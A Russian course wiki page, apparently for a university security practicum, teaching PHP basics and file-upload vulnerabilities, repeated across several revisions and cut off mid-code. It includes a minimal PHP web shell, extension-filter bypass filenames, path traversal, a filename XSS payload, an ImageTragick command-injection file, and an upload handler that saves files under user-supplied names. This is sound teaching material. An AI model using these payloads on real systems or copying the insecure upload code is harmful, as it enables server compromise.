require 'sub.php';
print("А я - index.php!");
</syntaxhighlight>
После подключения sub.php, содержимого этого файла доступно в index.php. Есть также include. Отличия между require() и include() таковы, что require() возвращает FATAL ERROR, если файл не найден, include() же возвращает только WARNING.

==Полезные константы==
* __DIR__ — полный путь к директории, в которой находится текущий сценарий
* __FILE__ — полный путь к текущему сценарию
* $_COOKIE — ассоциативный массив, содержащий куки
* $_SESSION — ассоциативный массив, содержащий информацию о сессии
* $_POST — ассоциативный массив, содержащий данные, полученные после POST запроса
* $_GET — ассоциативный массив, содержащий данные, полученные после GET запроса
=Примеры=
1. Пусть есть сайт с формой:
Клиент:
<syntaxhighlight lang="HTML">
<form name="feedback" method="POST" action="form.php">
<label>Ваше имя: <input type="text" name="name"></label>
<label>Ваш email: <input type="text" name="email"></label>
<label>Сообщение: <textarea name="message"></textarea></label>

<input type="submit" name="send" value="Отправить">
</form>
</syntaxhighlight>
При получении формы сервером, данные из неё можно получить следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_POST)) {
print("Имя: " . $_POST['name']);
print("<br>Email: " . $_POST['email']);
print("<br>Сообщение: " . $_POST['message']);
}
</syntaxhighlight>
2. Другой пример - отправка формы:
Клиент:
<syntaxhighlight lang="HTML">
<form name="file_upload" method="POST" action="form.php" enctype="multipart/form-data">
<label>Ваш аватар: <input type="file" name="avatar"></label>
<input type="submit" name="send" value="Отправить файл">
</form>
</syntaxhighlight>
Работать с файлом ожно следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_FILES['avatar'])) {
$file = $_FILES['avatar'];

print("Загружен файл с именем " . $file['name'] . " и размером " . $file['size'] . " байт");
}
</syntaxhighlight>
Если не переместить файл в постаянную папку - файл будет удален:
<syntaxhighlight lang="PHP">
$current_path = $_FILES['avatar']['tmp_name'];
$filename = $_FILES['avatar']['name'];
$new_path = dirname(__FILE__) . '/' . $filename;

move_uploaded_file($current_path, $new_path);
</syntaxhighlight>
=SQL=
Так же можно работать с базами данных. mysqli_connect - функция для подключения к mysql-серверу, mysqli_query - отправка sql-запроса:
<syntaxhighlight lang="PHP">
<?php
$link = mysqli_connect("localhost", "root", "");

$sql = 'INSERT INTO cities SET name = "Санкт-Петербург"';
$result = mysqli_query($link, $sql);

if ($result == false) {
print("Произошла ошибка при выполнении запроса");
}
</syntaxhighlight>

=web shell=

Простейшим примером является загрузка файла с расширением .php на сайт, работающий на PHP (в качестве проверки можно попробовать обратиться по адресу '''cite.com/index.php''' и не получить ошибки). По умолчанию PHP-сайты работают так что пользователь обращается по URL к файлу (URL сайта, начиная с первого /, отображаются на определенную директорию на сервере, она называется '''web root''') и, если этот файл имеет расширение php (или другое расширение из предопределенного списка расширений для PHP-файлов), то содержимое этого файла выполняется как код на PHP, вывод этого кода возвращается пользователю в ответе (кстати, так работает не только PHP, но и ASP.NET Web Forms, JSP, ASP). В результате, если пользователь может загрузить на сайт файл c расширением .php и обратиться к нему по URL (т. е. этот файл будет создан где-то внутри '''web root'''), то, если сервер специально не настроен чтобы файлы из директории для загрузок не выполнялись, PHP-код в нём будет выполнен. Соответственно, загрузив на уязвимый сайт файл <code>shell.php</code> с кодом
<pre>
42 * 66613;
<?php system('ls -lsa'); ?>
</pre>
и, получив ссылку на него (к примеру, /uploads/5c8e82bb8ad66/attack.php), обратится по ней, то в результате этот PHP-код выполнится и в ответе сервера будет
произведение чисел 42 и 66613, а также список всех файлов в длинном формате (функция PHP system работает так же как одноимённая функция библиотеки Си - то есть выполняет команду shell). В итоге атакующий получает выполнение произвольного кода на сервере (RCE).

=Обход методов защиты и атака=

==Валидация имени файла==

===Черный список ресширений===
Обходится с помощью использования двойных расширений (<code>shell.php.png</code>) или малоизвестный расширений (<code>.php5</code>, <code>.phtml</code>, <code>.shtml</code>, <code>.htaccess</code>). Кроме того, возможна инъекция нулевого байта (<code>shell.php%00.jpg</code>) или регистрозависимость при проверке (<code>PHp3</code>, <code>.aSp</code>).

===Белый список расширений===
Спасает от использования атакующим малоизвестных и регистрозависимых расширений, но все ещё обходится с помощью двойных расширений или инъекции нулевого байта.

===Санитайзеры===
Оставляет большую степень свободы. Например, если санитайзер удаляет вхождения подстрок типа <code>.php</code>, то использования имени файла вида <code>shell.p'''.php'''hp</code> позволяет после загрузки получить файл с именем <code>shell.php</code>.

==Валидация Content-Type==
Обходится изменением заголовка Content-Type, например, с помощью перехватывающего прокси (burp suite). Соответсвенно, в запросе
<pre>
POST / HTTP/1.1
Host: easy.fu.khashaev.ru
Content-Length: 200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: text/php
<?php phpinfo(); ?>
------WebKitFormBoundary--
</pre>
строчка <code>Content-Type: text/php</code> может быть заменена на строчку <code>Content-Type: image/png</code>.

==Прочее==
'''.htaccess''' - конфигурационный файл веб-сервера Apache, позволяющий управлять работой веб-сервера и настройками сайта с помощью различных параметров (директив) без изменения основного конфигурационного файла веб-сервера.

'''Server Side Includes''' - язык для динамической «сборки» веб-страниц на сервере из отдельных составных частей и выдачи клиенту полученного HTML-документа. Имеет расширения .shtml, .stm или .shtm. Например, при загрузке и вызове '''file.shtml''', содержащего код
<pre></pre>
атакующему будет выведен список файлов данной директории.

'''Static HTML'''

При возможности загрузить на сервис статический HTML, создается HTML-страница, содержащая вредоносный код (например, крадущего cookie), и ссылка на этот файл отправляется жертве.

'''Path Traversal'''

Атака, основанная на использовании специфически составленных имен файлов (например, <code>../config.ini</code>), позволяющих выйти за пределы директории хранения файлов. Может привести к переписыванию исходных фалов веб-приложения, конфигурационных или системных файлов.
Атака возможна, если не используется функция <code>basename</code> (возвращает последний компонент имени из указанного пути) или её аналог.

'''Filename XSS'''

Сервис уязвим к XSS, если допускается имя файла вида <code><script>alert(1)</script></code>.

==Полиглоты==
Полиглотами называют файлы, которые могут быть корректно распознаны как файлы разных типов.
Можно встраивать
* JavaScript в JPEG, GIF, PNG, PDF
* HTML в что-нибудь
* PHP в [https://rdot.org/forum/showthread.php?t=2780 JPEG ], [https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromgif GIF], [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ PNG]

===Структура JPEG===
Все jpeg-файлы имеют схожую структуру. Рассмотрим в качестве примера изображение

[[Файл:Mini.jpg|128px]]

В hex-редакторе оно выглядит следующим образом

[[Файл:Hex_print.png]]

В структуре jpeg-файлов содержатся служебные маркеры, состоящие из двух байт и всегда начинающиеся с FF.

* '''FF D8''' - маркер начала jpeg-файла;
* '''FF DA''' - маркер начала секции Start of Scan:
** в двух байтах хранится длинна заголовка изображения [00 0C];
** заголовок изображения [03 01 00 02 11 03 11 00 3F 00];
** непосредственно информацию о самом изображении;
* '''FF D9''' - маркер конца jpeg-файла.

=Image Magic=
'''ImageMagick''' — набор программ для чтения и редактирования файлов множества графических форматов, свободное и кроссплатформенное ПО. Может использоваться с языками Perl, C, C++, Python, Ruby, PHP, Node.js, Pascal, Java, Delphi, в скриптах командной оболочки или самостоятельно.
ImageMagick обладает широким набором возможностей (конвертация, маскирование, увеличение контрастности и т.п.) и поддерживает работу с различными типами файлов, но так же в нем находили различные уязвимости:
* RCE [CVE-2016-3714]
* SSRF [CVE-2016-3718]
* File deletion [CVE-2016-3715]
* File moving [CVE-2016-3716]
* Local File Read [CVE-2016-3717]
CVE - Common Vulnerabilities and Exposures - база данных общеизвестных уязвимостей информационной безопасности.

Был создан сайт [https://imagetragick.com/ ImageTragick], посвященный описанию некоторых уязвимостей ImageMagic.

'''Пример.'''

Допустим, что есть некоторый онлайн-сервис, позволяющих переводить файлы в разные форматы, использующий библиотеку ImageMagic.
Тогда, создав файл exploit.mvg с содержанием
<pre>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/
image.jpg " ; | ls "-la)'
pop graphic-context
</pre>
и выполнив запрос на преобразование файла, аналогичный команде
<pre>$ convert exploit.mvg out.png</pre>
атакующий получит список всех файлов директории.

=Стенды=
* http://easy.stands.prak.seclab.cs.msu.ru
* http://type.stands.prak.seclab.cs.msu.ru

=Ссылки=
* [https://drive.google.com/file/d/1Jep20CuBfcfKAeStwnHgR0gCf-O2Wgd0/view?usp=sharing Презинтация]
* [https://www.php.net/ https://www.php.net/] - сайт PHP
* [https://htmlacademy.ru/tutorial/php https://htmlacademy.ru/tutorial/php] - учебник PHP
* [http://www.php.su/php/?php http://www.php.su/php/?php] - ещё один учебник
* [https://www.alchemistowl.org/pocorgtfo/pocorgtfo15.pdf Полиглоты]
* [https://drive.google.com/file/d/1Rz0RP5tKIWCmFDP3-_--VYu40ejWf48v/view?usp=sharing Валидация структурных типов]

Практикум на ЭВМ (2021)

2021-10-07T12:19:40Z

Romankholin94: /* Веб */

Веб-безопасность/Уязвимости FileUpload

2021-10-07T12:15:31Z

Romankholin94: /* Задания */

=Введение=

'''Загрузка файлов пользователями''' - довольно частая часть функциональности веб-приложения (аватарки, хостинг файлов, посылка вложений вместе с сообщениями и т. д.). Небезопасная реализация этого механизма может приводить к очень серьезным уязвимостям.
Загрузка файлов необходима многим сервисам, таким как файлообменники, социальные сети, онлайн-конверторы и редакторы.

Самый простой способ реализации механизма загрузки файлов - просто создавать на файловой системе сервера файл с таким же содержимым как файл, отправленный пользователем (проще говоря, "класть" присланный пользователем файл куда-то на файловую систему сервера). После загрузки файл либо доступен пользователю по прямой ссылке (т. е. определенные URL-адреса отображаются на загруженные файлы и существует URL, обращение к которому ведет к отдаче загруженного файла), либо как то еще обрабатывается веб-приложением. Само веб-приложение во многом состоит из файлов на диске, поэтому добавление файлов на сервер может быть небезопасным, так как (в общем случае) может изменить логику работы приложения.
Соответственно, могут появляться следующие уязвимости:
* Remote Code Execution
* перезапись или удаление файлов
* Local File Read, SSRF
* Denial of Service
* Information Disclosure
* XSS
=PHP=
PHP (PHP: Hypertext Preprocessor) — скриптовый язык общего назначения, интенсивно применяемый для разработки веб-приложений.
==Привет, мир!==
Простейшая программа, выводящая надпись "Привет, мир!":
<syntaxhighlight lang="PHP">
<?php print("Привет, мир!");
</syntaxhighlight>
Каждый скрипт должен начинаться с <code> <?php </code> и желательно (но не всегда обязательно) на <code> ?> </code>. Пример кода, где <code> ?> </code> обязателен:
<syntaxhighlight lang="PHP">
<html>
<head>
<title>Наша первая php страница</title>
</head>
<body>
<h1><?php print("Привет, мир"); ?></h1>
</body>
</html>
</syntaxhighlight>
==Переменные==
В синтаксисе PHP имя переменной записывается латинскими символами, но первым символом всегда должен быть знак доллара $, после чего идёт имя. Не допускается начинать имя переменной с цифры, а также использовать любые значения, кроме букв алфавита и знака подчеркивания.

Правильные переменные:
<syntaxhighlight lang="PHP">
$age
$favorite_color
$name2
</syntaxhighlight>
Неправильные переменные:
<syntaxhighlight lang="PHP">
age
$42
$my-age
</syntaxhighlight>
Переменные бывают нескольких типов:
<syntaxhighlight lang="PHP">
$favorite_color = "green"; // строка
$favorite_number = 42; // целое число
$favorite_float_number = 0.5; // число с плавающей точкой
$favorite_bool = true; // boolean
</syntaxhighlight>
Числа можно складывать, вычитать, делить, умножать опреаторы стандартные, как и во всех языках: +, -, *, /, % - плюсь, минус, умножить, делить (деление не целочисленное), остаток от деления.
==Конкатенация==
Конкатенация - "cклейка" нескольких строчек в одну.
<syntaxhighlight lang="PHP">
<?php
$united_string = "Мой любимый цвет - " . $favorite_color . ", а любимое число - " . $favorite_number;
print($united_string);
</syntaxhighlight>
В коде выше $favorite_number - число. Поэтому данная переменная приводится к типу данных "строка", после чего уже происходит конкатенация.
==Ввод данных==
Данная функциональность редко используется, но нам это нужно было для решения задач на лекии. readline - функция ввода данных:
<syntaxhighlight lang="PHP">
<?php
$line = readline();
print($line);
</syntaxhighlight>
==Массивы==
Массив — структура данных, хранящая набор значений (элементов массива), идентифицируемых по индексу.

В обычных массивах в PHP индекс значение - целое число. Нумеруются массивы с 0:
<syntaxhighlight lang="PHP">
<?php
$fav_shows = ["game of thrones", "american horror story", "walking dead"];
</syntaxhighlight>
В ассоциативных массивах в качестве индекса может использоваться не только число. Например, строка:
<syntaxhighlight lang="PHP">
<?php
$user = ['age' => 42, 'name' => 'Иннокентий', 'fav_shows' => ["game of thrones", "american horror story", "walking dead"] ];
</syntaxhighlight>
==Условный оператор==
Синтаксис: if (условие):
<syntaxhighlight lang="PHP">
if ($gender == "мужчина") {
print("Приветствую тебя, мой Господин!");
} else if ($gender == "женщина") {
print("Приветствую тебя, о Госпожа!");
} else {
print("Не хватает гендеров.");
}
</syntaxhighlight>
* оператор присваивания: =
* операторы сравнения: ==, ===, !=, !==, >, <, <=, >=
* and, or - логические и и или соответственно
==Циклы==
Синтаксис while: while (условие_остановки):
<syntaxhighlight lang="PHP">
<?php
$i = 0;
while ($i < 10) {
print($i);
$i = $i + 1;
}
</syntaxhighlight>
Синтаксис for: for (команда,_выполняемая_до_цикла; условие_осатновки; команда,_выполняемая_в_ конце_каждой_операции):
<syntaxhighlight lang="PHP">
<?php
for ($x = 0; $x < 10; ++$x) {
print($x);
}
</syntaxhighlight>
Для асоциативных массивах есть цикл foreach:
<syntaxhighlight lang="PHP">
<?php
$user = [
'Имя' => 'Евгений',
'Возраст' => '27',
'Род занятий' => 'Программист'
];
foreach ($user as $key => $value) {
print($key . ': ');
print($value . '<br>');
}
</syntaxhighlight>
==Функции==
Синтаксис: имя_функции(аргументы_функции):
<syntaxhighlight lang="PHP">
function is_even($number) {
if ($number % 2 != 0) {
return false;
} else {
return true;
}
}
if (is_even(3)) {
print("3 - четное число");
} else {
print("3 - нечетное число");
}
</syntaxhighlight>
==Подключение файлов==
Чтобы не писать всё в одном файле, используется команда require.
Содержимое файла sub.php:
<syntaxhighlight lang="PHP">
<?php
print("Привет, я содержимое из sub.php!");
</syntaxhighlight>
Содержимое файла index.php:
<syntaxhighlight lang="PHP">
<?php
require 'sub.php';
print("А я - index.php!");
</syntaxhighlight>
После подключения sub.php, содержимого этого файла доступно в index.php.
==Полезные константы==
* __DIR__ — полный путь к директории, в которой находится текущий сценарий
* __FILE__ — полный путь к текущему сценарию
* $_COOKIE — ассоциативный массив, содержащий куки
* $_SESSION — ассоциативный массив, содержащий информацию о сессии
* $_POST — ассоциативный массив, содержащий данные, полученные после POST запроса
* $_GET — ассоциативный массив, содержащий данные, полученные после GET запроса
=Примеры=
1. Пусть есть сайт с формой:
Клиент:
<syntaxhighlight lang="HTML">
<form name="feedback" method="POST" action="form.php">
<label>Ваше имя: <input type="text" name="name"></label>
<label>Ваш email: <input type="text" name="email"></label>
<label>Сообщение: <textarea name="message"></textarea></label>

<input type="submit" name="send" value="Отправить">
</form>
</syntaxhighlight>
При получении формы сервером, данные из неё можно получить следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_POST)) {
print("Имя: " . $_POST['name']);
print("<br>Email: " . $_POST['email']);
print("<br>Сообщение: " . $_POST['message']);
}
</syntaxhighlight>
2. Другой пример - отправка формы:
Клиент:
<syntaxhighlight lang="HTML">
<form name="file_upload" method="POST" action="form.php" enctype="multipart/form-data">
<label>Ваш аватар: <input type="file" name="avatar"></label>
<input type="submit" name="send" value="Отправить файл">
</form>
</syntaxhighlight>
Работать с файлом ожно следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_FILES['avatar'])) {
$file = $_FILES['avatar'];

print("Загружен файл с именем " . $file['name'] . " и размером " . $file['size'] . " байт");
}
</syntaxhighlight>
Если не переместить файл в постаянную папку - файл будет удален:
<syntaxhighlight lang="PHP">
$current_path = $_FILES['avatar']['tmp_name'];
$filename = $_FILES['avatar']['name'];
$new_path = dirname(__FILE__) . '/' . $filename;

move_uploaded_file($current_path, $new_path);
</syntaxhighlight>
=SQL=
Так же можно работать с базами данных. mysqli_connect - функция для подключения к mysql-серверу, mysqli_query - отправка sql-запроса:
<syntaxhighlight lang="PHP">
<?php
$link = mysqli_connect("localhost", "root", "");

$sql = 'INSERT INTO cities SET name = "Санкт-Петербург"';
$result = mysqli_query($link, $sql);

if ($result == false) {
print("Произошла ошибка при выполнении запроса");
}
</syntaxhighlight>

=web shell=

Простейшим примером является загрузка файла с расширением .php на сайт, работающий на PHP (в качестве проверки можно попробовать обратиться по адресу '''cite.com/index.php''' и не получить ошибки). По умолчанию PHP-сайты работают так что пользователь обращается по URL к файлу (URL сайта, начиная с первого /, отображаются на определенную директорию на сервере, она называется '''web root''') и, если этот файл имеет расширение php (или другое расширение из предопределенного списка расширений для PHP-файлов), то содержимое этого файла выполняется как код на PHP, вывод этого кода возвращается пользователю в ответе (кстати, так работает не только PHP, но и ASP.NET Web Forms, JSP, ASP). В результате, если пользователь может загрузить на сайт файл c расширением .php и обратиться к нему по URL (т. е. этот файл будет создан где-то внутри '''web root'''), то, если сервер специально не настроен чтобы файлы из директории для загрузок не выполнялись, PHP-код в нём будет выполнен. Соответственно, загрузив на уязвимый сайт файл <code>shell.php</code> с кодом
<pre>
42 * 66613;
<?php system('ls -lsa'); ?>
</pre>
и, получив ссылку на него (к примеру, /uploads/5c8e82bb8ad66/attack.php), обратится по ней, то в результате этот PHP-код выполнится и в ответе сервера будет
произведение чисел 42 и 66613, а также список всех файлов в длинном формате (функция PHP system работает так же как одноимённая функция библиотеки Си - то есть выполняет команду shell). В итоге атакующий получает выполнение произвольного кода на сервере (RCE).

=Обход методов защиты и атака=

==Валидация имени файла==

===Черный список ресширений===
Обходится с помощью использования двойных расширений (<code>shell.php.png</code>) или малоизвестный расширений (<code>.php5</code>, <code>.phtml</code>, <code>.shtml</code>, <code>.htaccess</code>). Кроме того, возможна инъекция нулевого байта (<code>shell.php%00.jpg</code>) или регистрозависимость при проверке (<code>PHp3</code>, <code>.aSp</code>).

===Белый список расширений===
Спасает от использования атакующим малоизвестных и регистрозависимых расширений, но все ещё обходится с помощью двойных расширений или инъекции нулевого байта.

===Санитайзеры===
Оставляет большую степень свободы. Например, если санитайзер удаляет вхождения подстрок типа <code>.php</code>, то использования имени файла вида <code>shell.p'''.php'''hp</code> позволяет после загрузки получить файл с именем <code>shell.php</code>.

==Валидация Content-Type==
Обходится изменением заголовка Content-Type, например, с помощью перехватывающего прокси (burp suite). Соответсвенно, в запросе
<pre>
POST / HTTP/1.1
Host: easy.fu.khashaev.ru
Content-Length: 200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="info.php"
Content-Type: text/php
<?php phpinfo(); ?>
------WebKitFormBoundary--
</pre>
строчка <code>Content-Type: text/php</code> может быть заменена на строчку <code>Content-Type: image/png</code>.

==Прочее==
'''.htaccess''' - конфигурационный файл веб-сервера Apache, позволяющий управлять работой веб-сервера и настройками сайта с помощью различных параметров (директив) без изменения основного конфигурационного файла веб-сервера.

'''Server Side Includes''' - язык для динамической «сборки» веб-страниц на сервере из отдельных составных частей и выдачи клиенту полученного HTML-документа. Имеет расширения .shtml, .stm или .shtm. Например, при загрузке и вызове '''file.shtml''', содержащего код
<pre></pre>
атакующему будет выведен список файлов данной директории.

'''Static HTML'''

При возможности загрузить на сервис статический HTML, создается HTML-страница, содержащая вредоносный код (например, крадущего cookie), и ссылка на этот файл отправляется жертве.

'''Path Traversal'''

Атака, основанная на использовании специфически составленных имен файлов (например, <code>../config.ini</code>), позволяющих выйти за пределы директории хранения файлов. Может привести к переписыванию исходных фалов веб-приложения, конфигурационных или системных файлов.
Атака возможна, если не используется функция <code>basename</code> (возвращает последний компонент имени из указанного пути) или её аналог.

'''Filename XSS'''

Сервис уязвим к XSS, если допускается имя файла вида <code><script>alert(1)</script></code>.

==Полиглоты==
Полиглотами называют файлы, которые могут быть корректно распознаны как файлы разных типов.
Можно встраивать
* JavaScript в JPEG, GIF, PNG, PDF
* HTML в что-нибудь
* PHP в [https://rdot.org/forum/showthread.php?t=2780 JPEG ], [https://github.com/fakhrizulkifli/Defeating-PHP-GD-imagecreatefromgif GIF], [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ PNG]

===Структура JPEG===
Все jpeg-файлы имеют схожую структуру. Рассмотрим в качестве примера изображение

[[Файл:Mini.jpg|128px]]

В hex-редакторе оно выглядит следующим образом

[[Файл:Hex_print.png]]

В структуре jpeg-файлов содержатся служебные маркеры, состоящие из двух байт и всегда начинающиеся с FF.

* '''FF D8''' - маркер начала jpeg-файла;
* '''FF DA''' - маркер начала секции Start of Scan:
** в двух байтах хранится длинна заголовка изображения [00 0C];
** заголовок изображения [03 01 00 02 11 03 11 00 3F 00];
** непосредственно информацию о самом изображении;
* '''FF D9''' - маркер конца jpeg-файла.

=Image Magic=
'''ImageMagick''' — набор программ для чтения и редактирования файлов множества графических форматов, свободное и кроссплатформенное ПО. Может использоваться с языками Perl, C, C++, Python, Ruby, PHP, Node.js, Pascal, Java, Delphi, в скриптах командной оболочки или самостоятельно.
ImageMagick обладает широким набором возможностей (конвертация, маскирование, увеличение контрастности и т.п.) и поддерживает работу с различными типами файлов, но так же в нем находили различные уязвимости:
* RCE [CVE-2016-3714]
* SSRF [CVE-2016-3718]
* File deletion [CVE-2016-3715]
* File moving [CVE-2016-3716]
* Local File Read [CVE-2016-3717]
CVE - Common Vulnerabilities and Exposures - база данных общеизвестных уязвимостей информационной безопасности.

Был создан сайт [https://imagetragick.com/ ImageTragick], посвященный описанию некоторых уязвимостей ImageMagic.

'''Пример.'''

Допустим, что есть некоторый онлайн-сервис, позволяющих переводить файлы в разные форматы, использующий библиотеку ImageMagic.
Тогда, создав файл exploit.mvg с содержанием
<pre>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/
image.jpg " ; | ls "-la)'
pop graphic-context
</pre>
и выполнив запрос на преобразование файла, аналогичный команде
<pre>$ convert exploit.mvg out.png</pre>
атакующий получит список всех файлов директории.

=Стенды=
* http://easy.stands.prak.seclab.cs.msu.ru
* http://type.stands.prak.seclab.cs.msu.ru

=Ссылки=
* [https://drive.google.com/file/d/1Jep20CuBfcfKAeStwnHgR0gCf-O2Wgd0/view?usp=sharing Презинтация]
* [https://www.php.net/ https://www.php.net/] - сайт PHP
* [https://htmlacademy.ru/tutorial/php https://htmlacademy.ru/tutorial/php] - учебник PHP
* [http://www.php.su/php/?php http://www.php.su/php/?php] - ещё один учебник
* [https://www.alchemistowl.org/pocorgtfo/pocorgtfo15.pdf Полиглоты]
* [https://drive.google.com/file/d/1Rz0RP5tKIWCmFDP3-_--VYu40ejWf48v/view?usp=sharing Валидация структурных типов]

Веб-безопасность/Уязвимости FileUpload

2021-10-07T12:13:39Z

Romankholin94: /* Прочее */

=Введение=

'''Загрузка файлов пользователями''' - довольно частая часть функциональности веб-приложения (аватарки, хостинг файлов, посылка вложений вместе с сообщениями и т. д.). Небезопасная реализация этого механизма может приводить к очень серьезным уязвимостям.
Загрузка файлов необходима многим сервисам, таким как файлообменники, социальные сети, онлайн-конверторы и редакторы.

Самый простой способ реализации механизма загрузки файлов - просто создавать на файловой системе сервера файл с таким же содержимым как файл, отправленный пользователем (проще говоря, "класть" присланный пользователем файл куда-то на файловую систему сервера). После загрузки файл либо доступен пользователю по прямой ссылке (т. е. определенные URL-адреса отображаются на загруженные файлы и существует URL, обращение к которому ведет к отдаче загруженного файла), либо как то еще обрабатывается веб-приложением. Само веб-приложение во многом состоит из файлов на диске, поэтому добавление файлов на сервер может быть небезопасным, так как (в общем случае) может изменить логику работы приложения.
Соответственно, могут появляться следующие уязвимости:
* Remote Code Execution
* перезапись или удаление файлов
* Local File Read, SSRF
* Denial of Service
* Information Disclosure
* XSS
=PHP=
PHP (PHP: Hypertext Preprocessor) — скриптовый язык общего назначения, интенсивно применяемый для разработки веб-приложений.
==Привет, мир!==
Простейшая программа, выводящая надпись "Привет, мир!":
<syntaxhighlight lang="PHP">
<?php print("Привет, мир!");
</syntaxhighlight>
Каждый скрипт должен начинаться с <code> <?php </code> и желательно (но не всегда обязательно) на <code> ?> </code>. Пример кода, где <code> ?> </code> обязателен:
<syntaxhighlight lang="PHP">
<html>
<head>
<title>Наша первая php страница</title>
</head>
<body>
<h1><?php print("Привет, мир"); ?></h1>
</body>
</html>
</syntaxhighlight>
==Переменные==
В синтаксисе PHP имя переменной записывается латинскими символами, но первым символом всегда должен быть знак доллара $, после чего идёт имя. Не допускается начинать имя переменной с цифры, а также использовать любые значения, кроме букв алфавита и знака подчеркивания.

Правильные переменные:
<syntaxhighlight lang="PHP">
$age
$favorite_color
$name2
</syntaxhighlight>
Неправильные переменные:
<syntaxhighlight lang="PHP">
age
$42
$my-age
</syntaxhighlight>
Переменные бывают нескольких типов:
<syntaxhighlight lang="PHP">
$favorite_color = "green"; // строка
$favorite_number = 42; // целое число
$favorite_float_number = 0.5; // число с плавающей точкой
$favorite_bool = true; // boolean
</syntaxhighlight>
Числа можно складывать, вычитать, делить, умножать опреаторы стандартные, как и во всех языках: +, -, *, /, % - плюсь, минус, умножить, делить (деление не целочисленное), остаток от деления.
==Конкатенация==
Конкатенация - "cклейка" нескольких строчек в одну.
<syntaxhighlight lang="PHP">
<?php
$united_string = "Мой любимый цвет - " . $favorite_color . ", а любимое число - " . $favorite_number;
print($united_string);
</syntaxhighlight>
В коде выше $favorite_number - число. Поэтому данная переменная приводится к типу данных "строка", после чего уже происходит конкатенация.
==Ввод данных==
Данная функциональность редко используется, но нам это нужно было для решения задач на лекии. readline - функция ввода данных:
<syntaxhighlight lang="PHP">
<?php
$line = readline();
print($line);
</syntaxhighlight>
==Массивы==
Массив — структура данных, хранящая набор значений (элементов массива), идентифицируемых по индексу.

В обычных массивах в PHP индекс значение - целое число. Нумеруются массивы с 0:
<syntaxhighlight lang="PHP">
<?php
$fav_shows = ["game of thrones", "american horror story", "walking dead"];
</syntaxhighlight>
В ассоциативных массивах в качестве индекса может использоваться не только число. Например, строка:
<syntaxhighlight lang="PHP">
<?php
$user = ['age' => 42, 'name' => 'Иннокентий', 'fav_shows' => ["game of thrones", "american horror story", "walking dead"] ];
</syntaxhighlight>
==Условный оператор==
Синтаксис: if (условие):
<syntaxhighlight lang="PHP">
if ($gender == "мужчина") {
print("Приветствую тебя, мой Господин!");
} else if ($gender == "женщина") {
print("Приветствую тебя, о Госпожа!");
} else {
print("Не хватает гендеров.");
}
</syntaxhighlight>
* оператор присваивания: =
* операторы сравнения: ==, ===, !=, !==, >, <, <=, >=
* and, or - логические и и или соответственно
==Циклы==
Синтаксис while: while (условие_остановки):
<syntaxhighlight lang="PHP">
<?php
$i = 0;
while ($i < 10) {
print($i);
$i = $i + 1;
}
</syntaxhighlight>
Синтаксис for: for (команда,_выполняемая_до_цикла; условие_осатновки; команда,_выполняемая_в_ конце_каждой_операции):
<syntaxhighlight lang="PHP">
<?php
for ($x = 0; $x < 10; ++$x) {
print($x);
}
</syntaxhighlight>
Для асоциативных массивах есть цикл foreach:
<syntaxhighlight lang="PHP">
<?php
$user = [
'Имя' => 'Евгений',
'Возраст' => '27',
'Род занятий' => 'Программист'
];
foreach ($user as $key => $value) {
print($key . ': ');
print($value . '<br>');
}
</syntaxhighlight>
==Функции==
Синтаксис: имя_функции(аргументы_функции):
<syntaxhighlight lang="PHP">
function is_even($number) {
if ($number % 2 != 0) {
return false;
} else {
return true;
}
}
if (is_even(3)) {
print("3 - четное число");
} else {
print("3 - нечетное число");
}
</syntaxhighlight>
==Подключение файлов==
Чтобы не писать всё в одном файле, используется команда require.
Содержимое файла sub.php:
<syntaxhighlight lang="PHP">
<?php
print("Привет, я содержимое из sub.php!");
</syntaxhighlight>
Содержимое файла index.php:
<syntaxhighlight lang="PHP">
<?php
require 'sub.php';
print("А я - index.php!");
</syntaxhighlight>
После подключения sub.php, содержимого этого файла доступно в index.php.
==Полезные константы==
* __DIR__ — полный путь к директории, в которой находится текущий сценарий
* __FILE__ — полный путь к текущему сценарию
* $_COOKIE — ассоциативный массив, содержащий куки
* $_SESSION — ассоциативный массив, содержащий информацию о сессии
* $_POST — ассоциативный массив, содержащий данные, полученные после POST запроса
* $_GET — ассоциативный массив, содержащий данные, полученные после GET запроса
=Примеры=
1. Пусть есть сайт с формой:
Клиент:
<syntaxhighlight lang="HTML">
<form name="feedback" method="POST" action="form.php">
<label>Ваше имя: <input type="text" name="name"></label>
<label>Ваш email: <input type="text" name="email"></label>
<label>Сообщение: <textarea name="message"></textarea></label>

<input type="submit" name="send" value="Отправить">
</form>
</syntaxhighlight>
При получении формы сервером, данные из неё можно получить следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_POST)) {
print("Имя: " . $_POST['name']);
print("<br>Email: " . $_POST['email']);
print("<br>Сообщение: " . $_POST['message']);
}
</syntaxhighlight>
2. Другой пример - отправка формы:
Клиент:
<syntaxhighlight lang="HTML">
<form name="file_upload" method="POST" action="form.php" enctype="multipart/form-data">
<label>Ваш аватар: <input type="file" name="avatar"></label>
<input type="submit" name="send" value="Отправить файл">
</form>
</syntaxhighlight>
Работать с файлом ожно следующим образом:
Сервер:
<syntaxhighlight lang="PHP">
<?php
if (isset($_FILES['avatar'])) {
$file = $_FILES['avatar'];

print("Загружен файл с именем " . $file['name'] . " и размером " . $file['size'] . " байт");
}
</syntaxhighlight>
Если не переместить файл в постаянную папку - файл будет удален:
<syntaxhighlight lang="PHP">
$current_path = $_FILES['avatar']['tmp_name'];
$filename = $_FILES['avatar']['name'];
$new_path = dirname(__FILE__) . '/' . $filename;

move_uploaded_file($current_path, $new_path);
</syntaxhighlight>
=SQL=
Так же можно работать с базами данных. mysqli_connect - функция для подключения к mysql-серверу, mysqli_query - отправка sql-запроса:
<syntaxhighlight lang="PHP">
<?php
$link = mysqli_connect("localhost", "root", "");

